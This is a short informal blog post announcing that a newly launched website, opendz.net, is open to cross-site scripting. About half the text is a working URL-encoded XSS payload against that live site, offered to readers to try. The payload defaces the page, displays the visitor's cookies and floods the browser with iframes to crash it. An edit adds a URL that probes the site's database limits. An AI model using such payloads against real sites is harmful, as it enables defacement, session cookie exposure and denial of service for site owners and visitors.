Opendz.net is opened... I mean opened for XSS :D

[Edit] : sorry it's opendz.net and not opendz.com as stated before.
[Edit2] : see the end of the post.
it has been less that 30 seconds now, when I saw a post on my RSS feed about a new "Algerian" website http://opendz.net/, details are here.

I'm not sure, but... is any algerian website out there is vulnerable? I don't know why, but it is, just 10 seconds makes me see the whole picture of this new born.

Some screenshots :

Try this script, may crash your browser: http://opendz.net/?s=%3Cscript%3Evar+b1+%3D+document.getElementById(%22box1%22)%3Bb1.innerHTML+%3D+%22%3Cimg+src%3D%27http%3A%2F%2Fdiije.paradisia.net%2Fimages%2Fpirate.gif%27%2F%3E%22%3Bvar+b2+%3D+document.getElementById(%22box2%22)%3Bb2.innerHTML+%3D+%22%3Cimg+src%3D%27http%3A%2F%2Fdiije.paradisia.net%2Fimages%2Fpirate.gif%27%2F%3E%22%3Bvar+header+%3D+document.getElementById(%22header%22)%3Bheader.innerHTML+%3D+%22%3Cimg+src%3D%27http%3A%2F%2Fwww.spookynoodleghost.com%2Fshakelasta%2FShakeLastaPirateBanner.jpg%27%2F%3E%22%3Bvar+s%3D+document.getElementById(%22searchform%22)%3Bs.innerHTML+%3D+%22%3Ch2%3E%22+%2B+document.cookie+%2B+%22%3C%2Fh2%3E%22%3BsetTimeout(%22crash()%22%2C+4000)%3Bfunction+crash(){for(i%3D0%3Bi%3C500%3Bi%2B%2B){var+frame1+%3D+document.createElement(%22iframe%22)%3Bframe1.setAttribute(%22src%22%2C%22wp-admin%22)%3Bframe1.setAttribute(%22name%22%2C%22frame1%22)%3Bdocument.body.appendChild(frame1)%3B}%3Balert(%22%22)%3B}%3C%2Fscript%3E

So once again, web development is not just some simple CSS and nasty php scripts, it goes beyond that! (try asp.net maybe, it has a built-in XSS filter so I'll try to figure out other tests beyond XSS :D )

[Edit2]:
Apparelty we can even investigate some database information, for example, we can know that the type of the field used for the pagings is a SMALLINT UNSIGNED, this is not too bad, but better never reveal any information about your DB. You are wondering how could I know? here it is : http://opendz.net/rubrique/actualites/page/222222222222222222222222222222222222222222222222222222222222/ look how the 2s will be resigned to the biggest value the record in the database can hold which is  2147483647.

Anyways never feel sad about this, because some giants (they seems like), do the same errors, like this for example http://twitter.com/martani_net/status/3819027462 (see closely the title of the page stating "database error").

I think I'm gonna talk a little about ASP.NET and the .NET in general next time, maybe people will change their mind and go out to see what's beyond php XD.